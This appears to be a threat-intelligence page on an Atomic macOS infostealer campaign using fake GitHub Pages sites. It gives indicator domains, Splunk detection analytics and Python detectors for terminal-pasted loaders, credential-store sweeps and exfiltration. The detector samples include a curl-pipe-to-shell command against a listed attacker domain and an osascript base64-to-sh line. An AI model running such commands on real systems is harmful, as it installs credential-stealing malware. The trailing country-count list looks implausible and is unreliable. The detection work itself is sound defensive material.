Atomic GitHub Pages Campaign

Tags: macOS, infostealer, Atomic, GitHub Pages

In this campaign, attackers create fake GitHub Pages sites that pose as legitimate Mac applications. They lure users to these pages through search results and social media links, and the page instructs the visitor to paste a command into the terminal. When a user pastes the command, a small loader is downloaded and executed. The loader steals passwords, browser data, keychain items and wallet files, then sends them to the attackers' servers.

Indicators of Compromise

bonoud.com
macprograms-pro.com
ahoastock825.github.io
github.com

Note that github.com is the hosting platform rather than a blockable indicator; the campaign-specific GitHub Pages host is ahoastock825.github.io, and matching on github.com alone will only produce noise.

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence.

REMEDIATION

The detection content below is the generic ATT&CK guidance for each technique, and much of it is written against Windows telemetry (Sysmon, WinEventLog). For this macOS campaign the relevant signals are the macOS ones: shell and osascript execution spawned from a terminal, curl downloads, access to keychain, browser and wallet files, and outbound transfers to the listed domains.


T1204 - User Execution

ID | Data Source | Data Component

DS0015 | Application Log | Application Log Content
  Detects: Monitor logs from applications to detect user-initiated actions such as opening malicious documents, clicking on phishing links, or executing downloaded malware.
  Analytic 1 - Logs showing unexpected user actions triggering unusual processes.
    sourcetype=application_log (EventCode=1000 OR EventCode=1001)
    | search application IN ("winword.exe", "excel.exe", "chrome.exe", "firefox.exe", "adobe.exe", "zip.exe")
    | stats count by application event_description
    | where event_description IN ("opened document", "clicked link", "executed file")

DS0017 | Command | Command Execution
  Detects: Detect commands triggered by users, especially those involving decompression tools (e.g. for zip files) that may unpack malicious payloads. Such compression applications can be used to Deobfuscate/Decode Files or Information in payloads.
  Analytic 1 - Command lines showing decompression or decoding actions.
    sourcetype=WinEventLog:Powershell EventCode=4104
    | search process_name IN ("powershell.exe", "cmd.exe", "zip.exe", "winrar.exe")
    | stats count by process_name command_line user
    | where command_line LIKE "%unzip%" OR command_line LIKE "%decode%"

DS0032 | Container | Container Creation
  Detects: Monitor for newly constructed containers that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.
  Analytic 1 - Containers communicating with unexpected external services.
    (sourcetype=container_creation OR sourcetype=container_start)
    | stats count by container_name event_description user
    | where container_name NOT IN ("") AND event_description IN ("created", "started")

DS0032 | Container | Container Start
  Detects: Monitor for the activation or invocation of a container (ex: docker start or docker restart).

DS0022 | File | File Creation
  Detects: Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

DS0007 | Image | Image Creation
  Detects: Monitor for newly constructed images that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

DS0030 | Instance | Instance Creation
  Detects: Monitor for newly constructed instances that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.

DS0030 | Instance | Instance Start
  Detects: Monitor for the activation or invocation of an instance (ex: instance.start within GCP Audit Logs).

DS0029 | Network Traffic | Network Connection Creation
  Detects: Monitor network traffic patterns associated with web-based user actions, such as clicking on phishing links or executing malware that tries to establish C2 communication.
  Analytic 1 - Web-based network connections to suspicious destinations.
    sourcetype=sysmon EventCode=3
    | search process_name IN ("winword.exe", "chrome.exe", "firefox.exe")
    | stats count by src_ip dest_ip dest_port process_name
    | where dest_ip NOT IN ("")

DS0029 | Network Traffic | Network Traffic Content
  Detects: Monitor and analyze traffic patterns and packet inspection associated with web-based network connections that are sent to malicious or suspicious destinations (e.g. destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous process execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, .SCF, HTA, MSI, DLLs, or msiexec.exe).

DS0009 | Process | Process Creation
  Detects: Identify processes spawned by user actions, especially from Office documents, PDFs, or web browsers that could lead to malicious execution.
  Analytic 1 - Processes created from user interaction with files.
    ((sourcetype=WinEventLog:Security EventCode=4688) OR (sourcetype=Sysmon EventCode=1))
    | search parent_process IN ("winword.exe", "excel.exe", "chrome.exe", "firefox.exe")
    | stats count by parent_process process_name command_line user
    | where process_name NOT IN ("chrome.exe", "firefox.exe", "winword.exe", "excel.exe")


T1059 - Command and Scripting Interpreter

ID | Data Source | Data Component

DS0017 | Command | Command Execution
  Detects: Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.
  Analytic 1 - Suspicious script execution
    (sourcetype=WinEventLog:Security OR sourcetype=sysmon OR sourcetype=linux_secure OR sourcetype=linux_audit OR sourcetype=mac_os_log OR sourcetype=azure:audit OR sourcetype=o365:audit)
    | search Image IN ("bash", "sh", "cmd", "powershell", "python", "java", "perl", "ruby", "node", "osascript", "wmic")
    | eval suspicious_cmds=if(like(command_line, "%Invoke-Obfuscation%") OR like(command_line, "%-EncodedCommand%") OR like(command_line, "%IEX%") OR like(command_line, "%wget%") OR like(command_line, "%curl%"), "Yes", "No")

DS0011 | Module | Module Load
  Detects: Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).
  Analytic 1 - Look for unusual module loads associated with scripting languages.
    sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational
    | search EventCode=7 ImageLoaded IN ("C:\Windows\System32\JScript.dll", "C:\Windows\System32\vbscript.dll", "System.Management.Automation.dll")

DS0009 | Process | Process Creation
  Detects: Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight into adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
  Analytic 1 - Look for unusual command and scripting process creation.
    (sourcetype=WinEventLog:Security OR sourcetype=sysmon OR sourcetype=linux_secure OR sourcetype=linux_audit OR sourcetype=mac_os_log OR sourcetype=azure:audit OR sourcetype=o365:audit)
    (EventCode=4688 OR EventID=1 OR _raw=sh OR _raw=python OR _raw=powershell OR _raw=cmd OR _raw=script OR _raw=wscript OR _raw=bash)

DS0009 | Process | Process Metadata
  Detects: Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.[59]

DS0012 | Script | Script Execution
  Detects: Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
  Analytic 1 - Look for attempts to enable scripts on the system (the off-hours test uses strftime, since SPL's eval has no hour() function or BETWEEN operator).
    index=windows (EventCode=1 OR EventCode=4688 OR EventCode=4103 OR EventCode=4104) (CommandLine="script")
    | search script_name IN (".ps1", ".sh", ".py", ".rb", ".js", ".vbs")
    | eval hour=tonumber(strftime(_time, "%H"))
    | eval suspicious_script=if(like(script_name, "%.sh") AND (hour < 8 OR hour > 18), "Yes", "No")
    | where suspicious_script="Yes"
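The T1204 and T1059 entries above describe the signals for this campaign's entry point: a command pasted into a terminal that fetches a loader and runs it through a shell or osascript. The following Python is an added example, not code from this page or from any vendor tool, that applies the same scoring idea to constructed macOS process-creation events. The weighted domains are taken from the page's indicator list; the event format, field names, pattern weights and the alert threshold are assumptions chosen for illustration.

```python
import re

# Domains from the page's Indicators of Compromise list. github.com is left out
# of the weighted set on purpose: it is used legitimately everywhere, so on its
# own it would only add noise. The campaign-specific host is the *.github.io one.
CAMPAIGN_DOMAINS = ("bonoud.com", "macprograms-pro.com", "ahoastock825.github.io")

# Interpreters the page's T1059 analytic searches for (matched on image basename).
SCRIPT_INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python", "python3",
                       "perl", "ruby", "node", "powershell"}

# (pattern, weight, label): command-line shapes from the T1059 analytic plus the
# download-and-pipe-to-shell shape the campaign description relies on. Weights
# are assumptions, chosen so an IoC hit plus one shape crosses the threshold.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(curl|wget)\b"), 2, "download tool"),
    (re.compile(r"\|\s*(ba|z)?sh\b"), 3, "piped into shell"),
    (re.compile(r"\bbase64\b.*\s-[dD]\b"), 3, "base64 decode"),
    (re.compile(r"-EncodedCommand|\bIEX\b|Invoke-Obfuscation", re.I), 3, "encoded PowerShell"),
    (re.compile(r"\bosascript\b"), 2, "osascript"),
]


def score_event(event):
    """Score one process-creation event; returns (score, list_of_reasons)."""
    cmd = event["command_line"]
    score, reasons = 0, []
    image = event["image"].rsplit("/", 1)[-1]
    if image in SCRIPT_INTERPRETERS:
        score += 1
        reasons.append(f"interpreter {image}")
    # A loader fetched by a pasted command is a child of the user's terminal.
    if event.get("parent", "").endswith("/Terminal"):
        score += 1
        reasons.append("spawned from Terminal")
    for pattern, weight, label in SUSPICIOUS_PATTERNS:
        if pattern.search(cmd):
            score += weight
            reasons.append(label)
    for domain in CAMPAIGN_DOMAINS:
        if domain in cmd.lower():
            score += 5
            reasons.append(f"IoC domain {domain}")
    return score, reasons


def find_suspicious(events, threshold=6):
    """Return the events whose score meets the threshold, annotated with why."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append({**event, "score": score, "reasons": reasons})
    return hits


TERMINAL = "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"

# Constructed sample events (not real telemetry). The URL path is made up; the
# domain is from the page's IoC list.
SAMPLE_EVENTS = [
    {"ts": "2024-03-01T14:02:11", "user": "alice", "parent": TERMINAL, "image": "/bin/sh",
     "command_line": 'sh -c "curl -fsSL https://macprograms-pro.com/install.sh | sh"'},
    {"ts": "2024-03-01T14:05:40", "user": "alice", "parent": TERMINAL, "image": "/usr/bin/curl",
     "command_line": "curl -O https://github.com/octocat/Hello-World/archive/main.zip"},
    {"ts": "2024-03-01T03:00:00", "user": "root", "parent": "/usr/sbin/cron", "image": "/bin/bash",
     "command_line": "bash /usr/local/bin/backup.sh"},
    {"ts": "2024-03-01T14:06:02", "user": "alice", "parent": TERMINAL, "image": "/usr/bin/osascript",
     "command_line": "osascript -e 'do shell script \"echo aGVsbG8= | base64 -D | sh\"'"},
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit["ts"], hit["user"], hit["score"], ", ".join(hit["reasons"]))
```

Only the first and last sample events are reported: the plain curl of a GitHub archive scores 3 and the cron-driven backup script scores 1, which is the point of additive scoring rather than alerting on any single interpreter or download tool.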


T1005 - Data from Local System

ID | Data Source | Data Component

DS0017 | Command | Command Execution
  Detects: Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
  For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.

DS0022 | File | File Access
  Detects: Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (.pdf, .docx, .jpg, etc.) or local databases. On ESXi servers, this may include .vmdk and .vmsn files in the /vmfs/volumes directory.

DS0009 | Process | OS API Execution
  Detects: Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

DS0009 | Process | Process Creation
  Detects: Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

DS0012 | Script | Script Execution
  Detects: Monitor for any attempts to enable scripts running on a system that would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
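The File Access entry above asks for monitoring of unexpected reads of local data; the campaign description names what the loader actually collects: keychain items, browser data and wallet files. The following Python is an added example, not code from this page, that applies that guidance to constructed macOS file-access events. It classifies each path into one of those three categories, drops reads by the application that owns the data, and then reports only processes that swept more than one category, since an infostealer touches several stores in quick succession while a legitimate process rarely does. The path patterns and per-category allow-lists are illustrative assumptions to be replaced with a baseline from your own fleet.

```python
import re
from collections import defaultdict

# Categories of local data the page says the loader steals (keychain items,
# browser data, wallet files), each with a path pattern and the processes that
# are expected to read those files. Both are illustrative assumptions.
SENSITIVE_PATHS = [
    ("keychain", re.compile(r"/Library/Keychains/[^/]+\.keychain(-db)?$"),
     {"securityd", "Keychain Access"}),
    ("browser", re.compile(r"/(Login Data|Cookies|logins\.json|key4\.db)$"),
     {"Google Chrome", "firefox"}),
    ("wallet", re.compile(r"/(Exodus|Electrum)/"),
     {"Exodus", "Electrum"}),
]


def classify(path):
    """Map a file path to (category, expected_processes) or (None, None)."""
    for category, pattern, allowed in SENSITIVE_PATHS:
        if pattern.search(path):
            return category, allowed
    return None, None


def find_collection(events, min_categories=2):
    """Group unexpected sensitive-file reads by process and keep the processes
    that touched at least min_categories distinct categories: one unexpected
    read is common, sweeping keychain AND browser AND wallet data is not."""
    by_process = defaultdict(lambda: {"categories": set(), "paths": []})
    for event in events:
        category, allowed = classify(event["path"])
        if category is None:
            continue
        process = event["process"].rsplit("/", 1)[-1]
        if process in allowed:
            continue  # the application that owns the data
        key = (event["host"], event["pid"], process)
        by_process[key]["categories"].add(category)
        by_process[key]["paths"].append(event["path"])
    return {key: info for key, info in by_process.items()
            if len(info["categories"]) >= min_categories}


HOME = "/Users/alice"
CHROME = "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"

# Constructed file-access events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "mac-01", "pid": 501, "process": CHROME,
     "path": f"{HOME}/Library/Application Support/Google/Chrome/Default/Login Data"},
    {"host": "mac-01", "pid": 120, "process": "/usr/sbin/securityd",
     "path": f"{HOME}/Library/Keychains/login.keychain-db"},
    {"host": "mac-01", "pid": 300, "process": "/System/Applications/TextEdit.app/Contents/MacOS/TextEdit",
     "path": f"{HOME}/Documents/notes.txt"},
    {"host": "mac-01", "pid": 4242, "process": "/bin/sh",
     "path": f"{HOME}/Library/Application Support/Google/Chrome/Default/Login Data"},
    {"host": "mac-01", "pid": 4242, "process": "/bin/sh",
     "path": f"{HOME}/Library/Application Support/Firefox/Profiles/abc.default/logins.json"},
    {"host": "mac-01", "pid": 4242, "process": "/bin/sh",
     "path": f"{HOME}/Library/Keychains/login.keychain-db"},
    {"host": "mac-01", "pid": 4242, "process": "/bin/sh",
     "path": f"{HOME}/Library/Application Support/Exodus/exodus.wallet/seed.seco"},
]

if __name__ == "__main__":
    for (host, pid, process), info in find_collection(SAMPLE_EVENTS).items():
        print(host, pid, process, sorted(info["categories"]), len(info["paths"]), "files")
```

Chrome reading its own Login Data and securityd reading the keychain are filtered as expected owners; the single shell process that reads browser, keychain and wallet files is the only one reported.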


T1041 - Exfiltration Over C2 Channel

ID | Data Source | Data Component

DS0017 | Command | Command Execution
  Detects: Monitor executed commands and arguments that may steal data by exfiltrating it over an existing command and control channel.
  Analytic 1 - Detecting C2 Tool Execution Related to Exfiltration
    (EventCode=1 OR source="/var/log/audit/audit.log" type="execve")
    | where command IN ("powershell -enc", "python -c", "curl -d", "wget --post-file", "certutil -encode", "base64 -w 0")
    | eval risk_score=case(command IN ("powershell -enc", "certutil -encode"), 9, command IN ("python -c", "curl -d"), 8)
    | where risk_score >= 8
    | stats count by _time, host, user, command, risk_score

DS0022 | File | File Access
  Detects: Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over an existing command and control channel.
  Analytic 1 - Detecting File Access Before C2 Exfiltration
    (EventCode=11 OR EventCode=4663 OR source="/var/log/audit/audit.log" type="open")
    | where file_path IN ("/tmp/", "/var/tmp/", "/home//Downloads/", "C:\Users\\Documents\exfil")
    | eval risk_score=case(file_path IN ("/tmp/", "/var/tmp/"), 9, file_path IN ("/home//Downloads/*"), 8)
    | where risk_score >= 8
    | stats count by _time, host, user, file_path, risk_score

DS0029 | Network Traffic | Network Connection Creation
  Detects: Monitor for newly constructed network connections that are sent or received by untrusted hosts.
  Note: Network analysis frameworks such as Zeek can be used to capture, decode, and alert on TCP network connection creation.
  Analytic 1 - Detecting Outbound Network Connections for C2 Exfiltration (the first where clause selects upload-heavy connections; the connections are then counted per host and destination over one-hour buckets)
    (EventCode=3 OR source="zeek_conn.log" OR source="firewall_logs")
    | where bytes_out > 1000000 AND bytes_out > bytes_in * 5
    | bucket span=1h _time
    | stats count by _time, host, process, dest_ip, bytes_out
    | stats sum(count) as count, earliest(_time) as earliest, latest(_time) as latest by host, dest_ip
    | where count >= 5
    | eval risk_score=case(count >= 10, 9, count >= 5, 8)
    | table host, dest_ip, count, earliest, latest, risk_score

DS0029 | Network Traffic | Network Traffic Content
  Detects: Hidden or encoded data inside normal C2 traffic (e.g. Base64, XOR, custom encoding); HTTP/S payloads with unusually long strings in GET/POST requests; DNS tunneling techniques used to bypass security controls.
  Analytic 1 - Detecting Encoded or Hidden Data in C2 Channels (risk_score is computed before the stats so the field exists when it is grouped on)
    (EventCode=3 OR source="zeek_http.log" OR source="dns.log")
    | where uri_length > 200 OR request_body_length > 5000
    | eval encoded_data=if(match(uri, "([A-Za-z0-9+/=]{100,})") OR match(request_body, "([A-Za-z0-9+/=]{100,})"), 1, 0)
    | where encoded_data=1
    | eval risk_score=case(request_body_length > 10000, 9, request_body_length > 5000, 8)
    | where risk_score >= 8
    | stats count by _time, host, user, uri, request_body_length, risk_score
    | table host, uri, request_body_length, risk_score

DS0029 | Network Traffic | Network Traffic Flow
  Detects: Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
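The two Network Traffic analytics above, upload-heavy connections counted per host and destination in hourly buckets, and long request URIs or bodies that contain a base64-looking run, are easy to get wrong in a pipeline because the score has to exist before anything is grouped on it. The following Python is an added example, not code from this page or from Zeek, that implements both checks over constructed flow and HTTP records with the page's thresholds (1 MB outbound, 5:1 ratio, 5 connections, 200-character URI, 5000/10000-byte body, 100-character base64 run). The record layout, the 203.0.113.0/24 documentation addresses and the host names are assumptions; the bonoud.com destination is from the page's IoC list.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime

# Same character-class run the page's Network Traffic Content analytic uses.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/=]{100,}")


def hour_bucket(ts):
    """Truncate an ISO timestamp to the hour, like `bucket span=1h _time`."""
    return datetime.fromisoformat(ts).replace(minute=0, second=0, microsecond=0)


def heavy_outbound(conns, min_bytes=1_000_000, ratio=5, min_count=5):
    """Flag (host, dest_ip) pairs with at least min_count upload-heavy
    connections within one hour. Thresholds mirror the page's analytic."""
    counts = defaultdict(int)
    for c in conns:
        if c["bytes_out"] > min_bytes and c["bytes_out"] > c["bytes_in"] * ratio:
            counts[(c["host"], c["dest_ip"], hour_bucket(c["ts"]))] += 1
    alerts = []
    for (host, dest_ip, bucket), n in sorted(counts.items()):
        if n >= min_count:
            alerts.append({"host": host, "dest_ip": dest_ip, "hour": bucket.isoformat(),
                           "count": n, "risk_score": 9 if n >= 10 else 8})
    return alerts


def encoded_payloads(requests, uri_len=200, body_len=5000):
    """Flag HTTP requests whose URI or body is long AND contains a base64-like
    run. The score is computed per request, before any aggregation."""
    alerts = []
    for r in requests:
        body = r.get("body", "")
        if len(r["uri"]) > uri_len or len(body) > body_len:
            if BASE64_RUN.search(r["uri"]) or BASE64_RUN.search(body):
                alerts.append({"host": r["host"], "dest": r["dest"], "uri": r["uri"][:40],
                               "body_len": len(body),
                               "risk_score": 9 if len(body) > 10000 else 8})
    return alerts


# Constructed samples (not real traffic). 203.0.113.0/24 is a documentation
# range; the bonoud.com destination is from the page's IoC list.
SAMPLE_CONNS = [
    {"ts": f"2024-03-01T10:{m:02d}:00", "host": "mac-01", "dest_ip": "203.0.113.10",
     "bytes_out": 2_000_000, "bytes_in": 10_000} for m in range(0, 60, 10)
] + [
    # one large upload on its own: too few connections to alert
    {"ts": "2024-03-01T11:15:00", "host": "mac-02", "dest_ip": "203.0.113.20",
     "bytes_out": 50_000_000, "bytes_in": 1_000},
    # ordinary browsing: download-heavy, never counted
    {"ts": "2024-03-01T10:05:00", "host": "mac-01", "dest_ip": "203.0.113.30",
     "bytes_out": 4_000, "bytes_in": 900_000},
]

SAMPLE_HTTP = [
    # long query string, but '&' breaks every run well short of 100 chars: not flagged
    {"host": "mac-01", "dest": "203.0.113.30", "method": "GET",
     "uri": "/search?" + "&".join(f"k{i}=v{i}" for i in range(60)), "body": ""},
    # large POST body that is one base64 blob: flagged with the top score
    {"host": "mac-01", "dest": "bonoud.com", "method": "POST", "uri": "/upload",
     "body": "data=" + base64.b64encode(b"\x00" * 9000).decode()},
]

if __name__ == "__main__":
    print(heavy_outbound(SAMPLE_CONNS))
    print(encoded_payloads(SAMPLE_HTTP))
```

The long GET query string shows why the regex matters more than the length check alone: it is well over 200 characters but is not reported, while the 12 KB base64 body posted to the IoC domain is.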

Observed Countries (250)

AD (745)
AE (152)
AF (846)
AG (281)
AI (125)
AL (402)
AM (171)
AO (920)
AQ (543)
AR (605)
AS (518)
AT (754)
AU (298)
AW (6)
AX (581)
AZ (15)
BA (618)
BB (414)
BD (918)
BE (491)
BF (588)
BG (325)
BH (434)
BI (435)
BJ (149)
BL (789)
BM (601)
BN (217)
BO (673)
BQ (398)
BR (304)
BS (965)
BT (143)
BV (862)
BW (172)
BY (911)
BZ (19)
CA (232)
CC (972)
CD (312)
CF (315)
CG (857)
CH (722)
CI (706)
CK (134)
CL (314)
CM (818)
CN (237)
CO (906)
CR (498)
CU (895)
CV (105)
CW (424)
CX (343)
CY (888)
CZ (368)
DE (128)
DJ (913)
DK (414)
DM (440)
DO (332)
DZ (803)
EC (669)
EE (365)
EG (632)
EH (979)
ER (925)
ES (870)
ET (465)
FI (807)
FJ (96)
FK (848)
FM (149)
FO (127)
FR (983)
GA (883)
GB (871)
GD (898)
GE (821)
GF (900)
GG (579)
GH (53)
GI (769)
GL (686)
GM (660)
GN (369)
GP (319)
GQ (310)
GR (1)
GS (413)
GT (66)
GU (13)
GW (327)
GY (791)
HK (184)
HM (544)
HN (946)
HR (538)
HT (235)
HU (760)
ID (767)
IE (605)
IL (317)
IM (802)
IN (53)
IO (649)
IQ (551)
IR (531)
IS (174)
IT (654)
JE (957)
JM (475)
JO (202)
JP (885)
KE (688)
KG (332)
KH (246)
KI (467)
KM (570)
KN (389)
KP (728)
KR (270)
KW (684)
KY (470)
KZ (929)
LA (789)
LB (524)
LC (654)
LI (752)
LK (612)
LR (730)
LS (915)
LT (947)
LU (434)
LV (510)
LY (991)
MA (113)
MC (257)
MD (973)
ME (698)
MF (675)
MG (521)
MH (444)
MK (781)
ML (166)
MM (504)
MN (922)
MO (458)
MP (303)
MQ (803)
MR (510)
MS (419)
MT (43)
MU (68)
MV (248)
MW (104)
MX (246)
MY (594)
MZ (514)
NA (415)
NC (405)
NE (616)
NF (513)
NG (889)
NI (773)
NL (713)
NO (702)
NP (491)
NR (448)
NU (674)
NZ (466)
OM (662)
PA (822)
PE (648)
PF (619)
PG (545)
PH (421)
PK (187)
PL (905)
PM (913)
PN (439)
PR (465)
PS (120)
PT (231)
PW (892)
PY (185)
QA (958)
RE (746)
RO (275)
RS (488)
RU (132)
RW (517)
SA (62)
SB (612)
SC (959)
SD (194)
SE (933)
SG (851)
SH (876)
SI (132)
SJ (449)
SK (261)
SL (41)
SM (270)
SN (570)
SO (786)
SR (146)
SS (646)
ST (150)
SV (746)
SX (948)
SY (439)
SZ (927)
TC (660)
TD (580)
TF (372)
TG (174)
TH (737)
TJ (426)
TK (226)
TL (450)
TM (801)
TN (378)
TO (169)
TR (359)
TT (847)
TV (732)
TW (587)
TZ (489)
UA (836)
UG (569)
UM (568)
US (671)
UY (204)
UZ (671)
VA (938)
VC (205)
VE (243)
VG (362)
VI (341)
VN (334)
VU (159)
WF (36)
WS (993)
XK (897)
YE (129)
YT (470)
ZA (693)
ZM (768)
ZW (79)